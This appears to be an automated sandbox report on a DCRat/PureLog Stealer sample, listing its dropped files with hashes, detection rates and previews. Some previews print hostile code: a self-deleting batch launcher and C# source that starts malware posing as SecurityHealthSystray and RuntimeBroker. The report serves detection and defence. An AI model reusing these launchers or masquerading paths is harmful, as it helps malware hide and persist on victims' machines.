Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Desktop\AsBtWtog.log | 4si9noTBNw.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | FToZAUe1tw.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | fnNUIS1KeW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | kqq1aAcVUQ.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | Qsi7IgkrWa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | qNdO4D18CF.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | 4Awb1u1GcJ.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | LzmJLVB41K.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | s5duotgoYD.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | QMT2731i8k.exe | Get hash | malicious | DCRat | Browse |
Process: C:\Users\user\Desktop\JNKHlxGvw4.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 113
Entropy (8bit): 5.566304267644814
Encrypted: false
SSDEEP: 3:1IGL99n3t6rt9UxTE7ZJQWz/pE3SSNx5P2SDdV7:TLMrFUWYSSNfPzdV7
MD5: 816FA48FE26673C0D64554AAE166346D
SHA1: 5AB70C7AB8EB8FA1D6FB2C3C6E19DDBF4901F979
SHA-256: FCA52A501321D1CFFDF280185FB3FA359A6350D046F8AA0BD2400818DA8301CB
SHA-512: 70623C9480A92C4C652251BA3E10C393BE60532C585322B277CE15427116CF74E4C0438B3CE39C5CA4D8DE8ED53671D70FC30A1CB0DE28C677785B2FB24FFC22
Malicious: false
Preview: p0lQSmKUF11etHXoniGiLqO1unRsXc4yNTyZq7byBq4qGkYawipxv048lufoVb7n7DRZS78qHRhewhuKP06ywHDWY0y5bxdjtQtDT9Iyk9pdTaME9
Process: C:\Users\user\Desktop\JNKHlxGvw4.exe
File Type: MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
Category: dropped
Size (bytes): 1560958
Entropy (8bit): 7.974265283144141
Encrypted: false
SSDEEP: 24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
MD5: 6689BD9A5C795EEDC631E5FBB850B7FF
SHA1: B63D8E25D4EB9ABEA3ED0F7867F70DB2AB18CBA2
SHA-256: CB4626AD921C63113E18C3AEFB109F70C8E334089871133EA675D62D836D810B
SHA-512: FF51CCD8918344BB0439A4D9E39394383BFF2196496D778DB9A3D2862479E55F1BF59C7D467FF055C721231CB592C3C7DED63C5AF28A3F9552DC6421DD1151BF
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
Process: C:\Users\user\Desktop\JNKHlxGvw4.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
Process: C:\Users\user\Desktop\JNKHlxGvw4.exe
File Type: ASCII text, with very long lines (808), with no line terminators
Category: dropped
Size (bytes): 808
Entropy (8bit): 5.904553050193508
Encrypted: false
SSDEEP: 12:SWdW8SqhrBATGKlfPxXKZaE4IJ+5Qa3aPx5kGl5E8Xuo68ikse64rLDnTcfXL/uv:kqKTBE4IJ+nKjnV6FX4r3nTc/K06P0Pi
MD5: 1331CA20B77D7ED8AEB1DA6CD97DFF68
SHA1: BED2472C1483CE7B3792B2FDA605ACB13143AB7A
SHA-256: 3C224326CE1F276DA1FF873657A79D8323455B62550A39D5E1EDAE808E31A1F7
SHA-512: 1FFD1FD34F8E67D3E19DC0B644E938FFA68ABF59605AD54AE7EDBA30B188C5B328C20175282C87D3E08DACF38B823F06178E7049F18941AD015FCE98C1F616F7
Malicious: false
Process: C:\Users\user\Desktop\JNKHlxGvw4.exe
File Type: MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
Category: dropped
Size (bytes): 1560958
Entropy (8bit): 7.974265283144141
Encrypted: false
SSDEEP: 24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
MD5: 6689BD9A5C795EEDC631E5FBB850B7FF
SHA1: B63D8E25D4EB9ABEA3ED0F7867F70DB2AB18CBA2
SHA-256: CB4626AD921C63113E18C3AEFB109F70C8E334089871133EA675D62D836D810B
SHA-512: FF51CCD8918344BB0439A4D9E39394383BFF2196496D778DB9A3D2862479E55F1BF59C7D467FF055C721231CB592C3C7DED63C5AF28A3F9552DC6421DD1151BF
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with very long lines (517), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):517
                                                                                    Entropy (8bit):5.879614544419959
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:GPin0ZTxosgH5xKY7GYKMkTqa5MTUIhncpliFkP:GangTypK/qzdhcpl5P
                                                                                    MD5:8C5B957AE5381680A29CF531E70EC3C0
                                                                                    SHA1:A1398FEAEB4419257E50288B152514F3D0EDA288
                                                                                    SHA-256:133693D63070C4223A50890A7121F23972791E2BABA4A4CBD8A40EAE32BFB576
                                                                                    SHA-512:43C12A969AFFE99CCE7A788FB3DB2E0CE7783626567452260BD10697B1030EA3BF54FF59C542393AFB2E36B8C6095B43B4AB193531EE57FE88FD08B8C17B28A5
                                                                                    Malicious:false
                                                                                    Preview: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
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):1560958
                                                                                    Entropy (8bit):7.974265283144141
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
                                                                                    MD5:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    SHA1:B63D8E25D4EB9ABEA3ED0F7867F70DB2AB18CBA2
                                                                                    SHA-256:CB4626AD921C63113E18C3AEFB109F70C8E334089871133EA675D62D836D810B
                                                                                    SHA-512:FF51CCD8918344BB0439A4D9E39394383BFF2196496D778DB9A3D2862479E55F1BF59C7D467FF055C721231CB592C3C7DED63C5AF28A3F9552DC6421DD1151BF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1830
                                                                                    Entropy (8bit):5.3661116947161815
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4vtd
                                                                                    MD5:4E98592551BD0B069F525D5145C4AB1D
                                                                                    SHA1:F76B60DC100FAB739EB836650B112348ED7B9B97
                                                                                    SHA-256:171B3D8F6F3559D645DECCA2C9B750EBFD5511B6742C0157C60F46EAD6CC4F5E
                                                                                    SHA-512:E5C520597C414A3F73AF0C4F2E2A61CE594D8CEC7FF103D94CCAEA905E0D5F6AF32CFAB40026865AE86172904F927B928663C9FA4B0EBD397CC450BF124A318D
                                                                                    Malicious:true
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                    Process:C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):1281
                                                                                    Entropy (8bit):5.370111951859942
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                    Process:C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):1281
                                                                                    Entropy (8bit):5.370111951859942
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1613
                                                                                    Entropy (8bit):5.370675888495854
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4x
                                                                                    MD5:CFCC907668E9B1AED46D457F77536393
                                                                                    SHA1:5FD7371DBA3004E2BC1A83BA5C8AD4BD90FC2D28
                                                                                    SHA-256:414415C15FF1C315E383F642F353A36B24005E012073C05CC72A71173D6604CF
                                                                                    SHA-512:405A279EA079FAF8C38926EE256DEB2A4541C9752836C5BDE3E435A3437A3E95F086B1A4911BF19440341011771D46E1B1364C5FECEB21277EC0683367DFA4AE
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1510207563435464
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                    Malicious:false
                                                                                    Preview:@...e................................................@..........
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):154
                                                                                    Entropy (8bit):5.259308370552018
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7kC4jpCCvBktKcKZG1t+kiE2J5xAIP8zVzERHn:hCRLuVFOOr+DE7g/vKOZG1wkn23fE2h
                                                                                    MD5:1163C14F35E80C196F0C5D4066B721E5
                                                                                    SHA1:8B3E500A1BA3D3DCBBA848C5E6EFF90CA4ADB4B6
                                                                                    SHA-256:D1BC7C05C7DD723980C14D3B03DDF5DB3F891FF67234BD6AC56E70E6F0811325
                                                                                    SHA-512:90A2F7065E2C74BAB3856D27EE14D5A5BB0D0F4DFC46A545C04BC3839EF77BA87D32F2CA73917D3771164E8F66A057CFE0EBC2EFBB3D1B5AA7C0368CF843CB36
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\USZqVcJFLA.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8DlY2DY8qp.bat"
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Tue Dec 10 19:07:49 2024, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1952
                                                                                    Entropy (8bit):4.555811178058874
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:H8bW96XOglDfHUcfwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:Fe0BKhmMluOulajfqXSfbNtmh5Z
                                                                                    MD5:A1FA7BDE4C8579384927F90A2E76E463
                                                                                    SHA1:94FA3E01761E058DFB44F0F255240BB7CD944609
                                                                                    SHA-256:637152CA22FEF671D1386F593E035F550DA436BA7C899F8E2C6C4AA061EE5736
                                                                                    SHA-512:62D86F5084DE1077DA404FDBE72C2FE82774B38A9588EC7D851859FF36F7911FE9BC7FBA45B24C6070AD930FDBE8A5FFC01430740090DFEA619663A1CD649EBD
                                                                                    Malicious:false
                                                                                    Preview:L.....Xg.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES5227.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.323856189774724
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:KUDm2RR:KUDnR
                                                                                    MD5:13BC55E6BB37B4A988AD6FF343EEB93C
                                                                                    SHA1:42056EB7400D02C6B4FF8D27167E45C61809D052
                                                                                    SHA-256:1FEA7F84C667CF6F3068B9B7E132E1BB3B993C27A0E62A047477614D162ABDB4
                                                                                    SHA-512:D48E613FE1A21A12BC4E87828D24A41997DD846B52C4FEFE50A1AE42450E09779EC023B334AC5A05EA5CC659F987F7D6B2A8F7ED9D7667FD0B3AC1A7C3347F51
                                                                                    Malicious:false
                                                                                    Preview:JCPTy8vfyr1PrHOwbkD8ou5GY
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                    Category:dropped
                                                                                    Size (bytes):414
                                                                                    Entropy (8bit):4.974922029674802
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LSMKP0S3iFkD:JNVQIbSfhV7TiFkMSfhWLSMW0SSFkD
                                                                                    MD5:A62F958180D5F17202AEBB8F994F5E49
                                                                                    SHA1:18D3402548B4286D42F74E65E5D2E399D5434653
                                                                                    SHA-256:0752F8BC3FA3272F1B38930BA859A338F2309D070D3626145B9B1F4E35B0DF99
                                                                                    SHA-512:ACCDD8076C3224460F4B99441942AF502CFC6E8FDF5BC866B77F9CDCCC5B4E1C6C60239D713F4427732F27640E7839BC531C01B8ED03EB5FE4295408F87C79A7
                                                                                    Malicious:false
                                                                                    Preview:
                                                                                    using System.Diagnostics;
                                                                                    using System.Threading;

                                                                                    class Program
                                                                                    {
                                                                                        static void Main(string[] args)
                                                                                        {
                                                                                            new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();
                                                                                            new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"); } catch { } }).Start();
                                                                                        }
                                                                                    }
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
